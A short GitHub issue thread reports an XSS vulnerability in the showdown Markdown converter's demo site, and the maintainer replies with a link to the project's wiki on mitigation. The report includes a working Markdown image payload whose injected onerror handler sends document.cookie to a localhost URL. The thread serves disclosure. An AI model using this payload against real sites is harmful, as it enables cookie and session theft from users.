### ISSUE TITLE
Critical XSS vulnerability

### ISSUE THREAD

**Issue by ufocoder** [showdownjs/showdown#283]
There's a critical XSS vulnerability, just try to execute this code at your [demo website](http://showdownjs.github.io/demo/)

```
![bad markdown](test"onerror="window.location='http://localhost.demo?q='+document.cookie//";) hello
```

**Comment by tivie** [comment]
Please check the documentation about this topic in the wiki
https://github.com/showdownjs/showdown/wiki/Markdown's-XSS-Vulnerability-(and-how-to-mitigate-it)
